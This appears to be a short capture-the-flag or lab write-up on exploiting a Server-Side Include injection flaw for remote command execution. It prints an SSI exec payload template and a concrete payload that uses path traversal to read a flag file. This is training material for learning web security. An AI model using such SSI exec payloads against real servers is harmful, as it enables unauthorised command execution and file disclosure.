LinkedInGitHub

SSI Injection

Exploit the SSI Injection vulnerability to obtain RCE and read the flag.

This exercise is pretty straightfoward, since we just have to adapt the exec command on the application.

<!--#exec cmd="UNIX command" -->
<!--#exec cmd="cat ../../../flag.txt" -->

After looking into the directories we managed to get the flag with the command above!

PreviousExploiting SSTI - TwigNextExploiting XSLT Injection

Last updated